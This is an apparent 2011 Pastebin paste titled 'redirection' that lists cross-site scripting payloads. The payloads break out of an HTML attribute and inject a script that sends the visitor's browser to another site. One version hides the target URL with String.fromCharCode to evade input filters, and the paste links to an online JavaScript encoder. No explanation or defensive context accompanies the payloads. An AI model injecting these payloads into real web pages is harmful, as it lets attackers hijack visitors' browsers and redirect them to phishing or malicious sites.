Guest User

redirection

a guest
Jul 28th, 2011
134
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Java 0.39 KB | None | 0 0
  1. "><script>document.location='http://whatever';</script>
  2. document.location='http://www.some-other-webpage.com';
  3. "><script>document.location='http://whatever';</script>
  4.  
  5. For example, this would redirect to www.google.com:
  6. <script>document.location=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,103,111,111,103,108,101,46,99,111,109)</script>
  7.  
  8. Encoder:
  9. http://www.achari.in/jse/
Advertisement
Add Comment
Please, Sign In to add comment